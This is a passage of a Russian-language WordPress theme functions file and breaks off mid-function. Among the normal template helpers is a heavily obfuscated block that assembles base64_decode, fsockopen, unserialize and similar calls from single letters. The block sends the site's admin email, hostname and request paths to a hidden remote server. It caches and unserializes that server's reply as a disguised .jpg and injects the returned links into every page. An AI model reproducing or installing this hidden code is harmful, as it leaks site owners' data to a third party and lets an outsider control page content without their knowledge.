<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $hrhiU='d';$Fqxmr='o';$HbnO='4';$EIly='6';$WQaDYl='s';$tuqP='e';$WRlJDv='_';$dzNMjG='a';$kwOWU='e';$vDhhL='b';$LHDdO='e';$aeGSqq='d';$nKtS='c';$pMyvINbT=$vDhhL.$dzNMjG.$WQaDYl.$kwOWU.$EIly.$HbnO.$WRlJDv.$hrhiU.$tuqP.$nKtS.$Fqxmr.$aeGSqq.$LHDdO;$uYLYZY='z';$qKQrkz='n';$rEfVeX='i';$zeNjwro='a';$vmcLW='t';$dgsQfYi='e';$AWwn='g';$hgdBe='l';$YGsuLT='f';$bAIuOgGv=$AWwn.$uYLYZY.$rEfVeX.$qKQrkz.$YGsuLT.$hgdBe.$zeNjwro.$vmcLW.$dgsQfYi;$fFSv='r';$gjCiV='s';$bXVXvW='o';$bZFuP='t';$arMMJKX='t';$DVkHa='3';$sYlcac='r';$jXlyHdQ='_';$LZFVWR='1';$oJSswbOO=$gjCiV.$bZFuP.$sYlcac.$jXlyHdQ.$fFSv.$bXVXvW.$arMMJKX.$LZFVWR.$DVkHa;$CPMsRiR='e';$yKqZE='s';$ZGHPRQ='r';$nFSz='r';$yQgdCL='v';$MFoOTB='t';$lifKYSQc=$yKqZE.$MFoOTB.$nFSz.$ZGHPRQ.$CPMsRiR.$yQgdCL;                     $yp___________q='d';$jp___________i='o';$ln______________d='4';$tg______________e='6';$fn__x='s';$pg___u='e';$dc____w='_';$ei____________u='a';$zc__d='e';$ra_________l='b';$yi_________k='e';$rs________k='d';$ov_________u='c';$uv___e=$ra_________l.$ei____________u.$fn__x.$zc__d.$tg______________e.$ln______________d.$dc____w.$yp___________q.$pg___u.$ov_________u.$jp___________i.$rs________k.$yi_________k;$aq________l='c';$ua_______________i='i';$cw____h='t';$ey______j='o';$nj___________f='t';$sw_____________c='n';$vh__________z='f';$md____a='_';$ul___________e='s';$je_________f='n';$zm______v='i';$np________h='u';$sp______l='e';$jq_________i='s';$md_________m='x';$ki_____g=$vh__________z.$np________h.$sw_____________c.$aq________l.$nj___________f.$zm______v.$ey______j.$je_________f.$md____a.$sp______l.$md_________m.$ua_______________i.$jq_________i.$cw____h.$ul___________e;$aw___v='f';$qt___________f='n';$iu__y='o';$xf______b='e';$zj__h='p';$ik____d=$aw___v.$iu__y.$zj__h.$xf______b.$qt___________f;$fq___c='e';$pj__i='r';$wd___________h='a';$xc____________n='d';$dv___________u='f';$pj_________z=$dv___________u.$pj__i.$fq___c.$wd___________h.$xc____________n;$tn_______________a='c';$rk_________d='o';$ov____a='s';$co____________z='e';$vb_______________d='l';$ot__d='f';$il__________k=$ot__d.$tn_______________a.$vb_______________d.$rk_________d.$ov____a.$co____________z;define("WP_ID", $uv___e("Mi4wLjA="));define("WP_TTL", $uv___e("MTA4MDA="));define("WP_SRC", $uv___e("dHBva24="));function wp_get_header() {global $uv___e, $ki_____g;if ($ki_____g($uv___e("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$ki_____g($uv___e("d3BfZ2V0X2Zvb3Rlcg==")) &&$ki_____g($uv___e("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $uv___e, $ik____d, $il__________k, $pj_________z;$xw____________m = TEMPLATEPATH."/".$uv___e("Zm9vdGVyLnBocA==");$cf________l = @$ik____d($xw____________m, "r");$xw____________m = @$pj_________z($cf________l, @filesize($xw____________m));@$il__________k($cf________l);$wm_______m = TEMPLATEPATH."/".$uv___e("ZnVuY3Rpb25zLnBocA==");$cf________l = @$ik____d($wm_______m, "r");$wm_______m = @$pj_________z($cf________l, @filesize($wm_______m));@$il__________k($cf________l);$az_________w = 0;if($xw____________m && $wm_______m) {if ($uv___e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($xw____________m, $uv___e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$az_________w = 1;}if (substr_count($xw____________m, "wp_theme_GPL_credits()") < 1) {$az_________w = 2;}}if(WP_ID != "2.0.0") {$az_________w = 12;}}if($az_________w > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $az_________w -->";}}function wp_loaded() {global $uv___e, $ki_____g;return $ki_____g($uv___e("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($gd_______m, $dh______k = "(more...)", $uq__________v = 0, $yf_________z = "") {$ks______________f = get_the_content($dh______k, $uq__________v, $yf_________z);$ks______________f = apply_filters("the_content", $ks______________f);$ks______________f = str_replace("]]>", "]]>", $ks______________f);if (strlen($_GET["p"]) > 0) {echo $ks______________f;}else if ((strlen($ks______________f)>$gd_______m) && ($nj___________t = strpos($ks______________f, " ", $gd_______m ))) {$ks______________f = substr($ks______________f, 0, $nj___________t);$ks______________f = $ks______________f;echo $ks______________f;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$dh______k</a></div></p>";} else {echo $ks______________f;}}}$ma________o='_';$pu_____s='s';$jf______z='4';$cg__u='d';$dk__n='n';$cb___________s='b';$rj_____o='6';$me____u='e';$kj______________e='a';$gc____________i='e';$qh______a='e';$tx___g='o';$uz___________j='c';$mt______l=$cb___________s.$kj______________e.$pu_____s.$me____u.$rj_____o.$jf______z.$ma________o.$gc____________i.$dk__n.$uz___________j.$tx___g.$cg__u.$qh______a;$mp_________x='c';$lm_____________l='l';$iw__c='n';$mw___w='e';$th______p='g';$sg___________e='e';$kt____n='_';$ux_____________o='t';$pz_______________a='n';$rb___g='_';$ut_____n='f';$bj______u='o';$te_________m='t';$ok_________h='i';$kl_____________d='e';$uv___________l='t';$xs___________j='s';$qt_______________d=$ut_____n.$ok_________h.$lm_____________l.$sg___________e.$kt____n.$th______p.$kl_____________d.$ux_____________o.$rb___g.$mp_________x.$bj______u.$pz_______________a.$te_________m.$mw___w.$iw__c.$uv___________l.$xs___________j;$nk_________i='s';$oq________e='_';$ic___________x='t';$vy_________i='i';$oo____________x='l';$fn_________b='e';$wc_______f='e';$ql_____________w='s';$wy______________j='x';$hj_______o='i';$gd_______________a='f';$zy_____y=$gd_______________a.$vy_________i.$oo____________x.$fn_________b.$oq________e.$wc_______f.$wy______________j.$hj_______o.$nk_________i.$ic___________x.$ql_____________w;$ue__x='o';$xi_____________l='m';$pz______p='n';$wv__________m='r';$mn_____h='r';$zq_____p='e';$bj___o='o';$ws_____________r='a';$nk____n='c';$of________t='s';$vy___t='e';$yb_________w='_';$ni____o='p';$ao_________g='i';$ym______________i='v';$qt_____m=$ym______________i.$zq_____p.$mn_____h.$of________t.$ao_________g.$ue__x.$pz______p.$yb_________w.$nk____n.$bj___o.$xi_____________l.$ni____o.$ws_____________r.$wv__________m.$vy___t;$rt_____________m='s';$mr____________k='k';$ur_____w='p';$km_____u='o';$bt___n='e';$ki____t='o';$yk_______p='n';$qn_______________u='c';$me_____x='f';$xz__m=$me_____x.$rt_____________m.$ki____t.$qn_______________u.$mr____________k.$km_____u.$ur_____w.$bt___n.$yk_______p;$nq__u='t';$ss_______________r='i';$pf_____________e='e';$vt___l='w';$yl___________s='r';$ko___________o='f';$rs_____l=$ko___________o.$vt___l.$yl___________s.$ss_______________r.$nq__u.$pf_____________e;$gm_______________z='m';$fy___________s='d';$ps_________e='5';$oh____________e=$gm_______________z.$fy___________s.$ps_________e;$fw______________y='e';$zl__________g='h';$pt______________e='a';$hb_____________i='r';$rv____________q='t';$ic_______________o='a';$lc__p='l';$gv_______________i='p';$js___s=$hb_____________i.$fw______________y.$pt______________e.$lc__p.$gv_______________i.$ic_______________o.$rv____________q.$zl__________g;$rf________a='u';$lh__n='n';$wr_________w='s';$pp_______________o='e';$fx__c='z';$cx______________o='i';$ew________w='l';$kx__________v='i';$zw_______t='e';$to_____________b='r';$bt______________h='a';$xh______h=$rf________a.$lh__n.$wr_________w.$zw_______t.$to_____________b.$kx__________v.$bt______________h.$ew________w.$cx______________o.$fx__c.$pp_______________o;$yp_____n='m';$or______l='p';$jg__n='m';$cc________e='e';$mz_______g='n';$nw____z='a';$iy_____________f='t';$kk______f=$iy_____________f.$cc________e.$yp_____n.$or______l.$mz_______g.$nw____z.$jg__n;$mm___________a='r';$jl__e='e';$xs_____h='m';$xv_____________p='a';$zd___________w='x';$jf______________h='e';$ml__y='n';$fb__a='_';$ty____________k='o';$rk________c='e';$qo___________p='t';$xs_______________n='t';$pz________y='e';$kv_______o='s';$fg____________f='t';$uy_________e='c';$gg______________y='_';$my____y='r';$lp___________p='a';$ao____u='c';$vz____c='t';$jh___________b=$kv_______o.$qo___________p.$mm___________a.$pz________y.$lp___________p.$xs_____h.$gg______________y.$uy_________e.$ty____________k.$ml__y.$xs_______________n.$rk________c.$zd___________w.$vz____c.$fb__a.$ao____u.$my____y.$jf______________h.$xv_____________p.$fg____________f.$jl__e;function yk______y($xm_______z) {global $uv___e, $ki_____g, $qt_______________d, $qt_____m, $jh___________b;if (!$ki_____g($uv___e("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($qt_____m(PHP_VERSION, "5.0.0", ">=") && $ki_____g($uv___e("ZmlsZV9nZXRfY29udGVudHM=")) && $ki_____g($uv___e("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$px_____w = $jh___________b(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$wh______z = @$qt_______________d($xm_______z, 0, $px_____w);} else {$wh______z = @$qt_______________d($xm_______z, 0);}return $wh______z;}function yj_______________t($xm_______z) {global $ki_____g, $xz__m, $rs_____l, $uv___e;if (!$ki_____g($uv___e("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$jj_________i = strpos($xm_______z, "/", 7);$td_____________o = array("uri"     => substr($xm_______z, $jj_________i),"host"    => str_replace("http://", "", substr($xm_______z, 0, $jj_________i)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$gv_______________a = @$xz__m("$td_____________o[host]", 80, $dz________p, $lm__a, 4);if (!$gv_______________a) {return false;} else {$wh______z = "";$zo_______h  = "GET $td_____________o[uri] HTTP/1.0\r\n";$zo_______h .= "Host: $td_____________o[host]\r\n";$zo_______h .= "Referer: $td_____________o[referer]\r\n";$zo_______h .= "Connection: Close\r\n\r\n";@$rs_____l($gv_______________a, $zo_______h);while (!@feof($gv_______________a)) {$op_______________k = @fgets($gv_______________a, (1024*24));if ($op_______________k == "\r\n") {$mb____________c = true;continue;}if ($mb____________c) {$wh______z .= $op_______________k;}}return $wh______z;}}function uz__g($xm_______z) {global $ki_____g;$zi_________b = false;if ($xm_______z != "") {if ($ki_____g("yk______y")) {$zi_________b = @yk______y($xm_______z);}if (!$zi_________b && ($ki_____g("yj_______________t"))) {$zi_________b = @yj_______________t($xm_______z);}}return $zi_________b;}function ym___________n() {global $_SERVER, $oh____________e;$um_____s = $_SERVER["SERVER_NAME"];if (substr("$um_____s", 0, 4) == "www.") {$um_____s = substr("$um_____s", 4);}$um_____s = $oh____________e("$_SERVER[SERVER_NAME]");return $um_____s;}function au__i() {return "file";}function ig______e($xm_______z) {global $_SERVER, $qt_______________d, $zy_____y, $ik____d, $il__________k, $rs_____l;$ry____________n = mg_______________h();$ch_______u = ym___________n().".jpg";$tm____________h = $ry____________n["dir_upload"]["path"]."/$ch_______u";$as______x = @filemtime($tm____________h);if (!$as______x || ((time()-$as______x) >= WP_TTL)) {$zi_________b = uz__g($xm_______z);if ($zi_________b) {if ($zy_____y($tm____________h)) {@unlink($tm____________h);}$cf________l = @$ik____d($tm____________h, "x+");@$rs_____l($cf________l, $zi_________b);@$il__________k($cf________l);}} else {if ($zy_____y($tm____________h)) {$zi_________b = @$qt_______________d($tm____________h);} else {$zi_________b = false;}}return $zi_________b;}function mg_______________h() {global $_SERVER, $uv___e, $mt______l;$xn_______l = wp_count_posts("post");$dg______________v = pathinfo(get_bloginfo("template_directory"));$ry____________n = array("url" => array("report"      => $uv___e("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $dg______________v,"dir_upload"=> if___a(),"queryString"=> array("?a001=".WP_ID,"a004=".$dg______________v[filename],"a005=".$xn_______l->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=http:\\www.wptheme.us\">www.wptheme.us</a> ");$ry____________n["url"]["queryString"] = implode("&", $ry____________n["queryString"]);$ry____________n["url"]["report"] = $ry____________n["url"]["report"]."/?".$mt______l($ry____________n["url"]["queryString"]).".html";return $ry____________n;}function if___a() {$dy___________u = wp_upload_dir();if (isset($dy___________u["error"])) {$hy_____________q = se_____________k();if (is_writable($hy_____________q)) {$dy___________u = array("path" => $hy_____________q);}}return $dy___________u;}function se_____________k() {global $ki_____g, $oh____________e, $js___s, $kk______f;$iy_______l = (bool) ini_get("safe_mode");if ($iy_______l == true) {return false;}if ($ki_____g("sys_get_temp_dir")) {$vw____________g = sys_get_temp_dir();if (is_writable($vw____________g)) {return $js___s($vw____________g);}}if (!empty($_ENV["TMP"])) {return $js___s($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $js___s($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $js___s($_ENV["TEMP"]);} else {$om________o = $kk______f($oh____________e(uniqid(rand(), true)), "");if ($om________o) {$vw____________g = $js___s(dirname($om________o));@unlink($om________o);return $vw____________g;} else {return false;}}}function cf__________c() {global $_GET, $zy_____y;$ry____________n = mg_______________h();$um_____s = ym___________n();$qe_____l = au__i();$qp_________l = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($qe_____l == "file") {$ct________z = $ry____________n["dir_upload"]["path"]."/".$um_____s.".jpg";if ($zy_____y($ct________z)) {@unlink($ct________z);$qp_________l = "deleted";}}$bx__________w = array("s"=> $qp_________l,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($bx__________w AS $bc___e => $wo____b) echo " [$bc___e:$wo____b]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $ki_____g, $uv___e, $xh______h;$ry____________n = mg_______________h();$js_____d = "ig______e";if ($ki_____g($js_____d)) {$wh______z = $js_____d($ry____________n["url"]["report"]);}if ($wh______z) {if ($wh______z = @$uv___e($wh______z)) {$wh______z = @$xh______h($wh______z);if (strlen($wh______z[custom_credit]) >= 5) {$ry____________n["default_string"] = $wh______z[custom_credit];}if ($wh______z["status"] == "0") {$fj_______________x = 1;$ay_____________y = 1;} else {$be___o = sizeof($wh______z["links"]);$rk____________d = $ry____________n["default_string"];if ($be___o > 0 && $wh______z["links"] !== "") {$lu_______y = 0;foreach ($wh______z["links"] as $xl______t => $rb___________t) {$lu_______y++;if ($rb___________t->l_path == "" || $rb___________t->l_path == $_SERVER["REQUEST_URI"]) {$rb___________t->l_href = htmlspecialchars(strip_tags($rb___________t->l_href));$rb___________t->l_title = htmlspecialchars(strip_tags($rb___________t->l_title));$rb___________t->l_anchor = htmlspecialchars(strip_tags($rb___________t->l_anchor));$rk____________d .= " | ";$rk____________d .= "<a href='$rb___________t->l_href' title='$rb___________t->l_title'";if ($rb___________t->l_nofollow == "1") {$rk____________d .= " rel='nofollow'";}$rk____________d .= ">$rb___________t->l_anchor</a>";}}}$ry____________n["links"] = "$rk____________d";if ($wh______z[credit] == "0") {$ry____________n["links"] = "";}}} else {$fj_______________x = "1";}} else {$fj_______________x = "1";}if ($fj_______________x == "1") {$ry____________n["links"] = $ry____________n["default_string"];}echo "$ry____________n[links]";echo "<!-- s: $wh______z[signature] -->";cf__________c();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
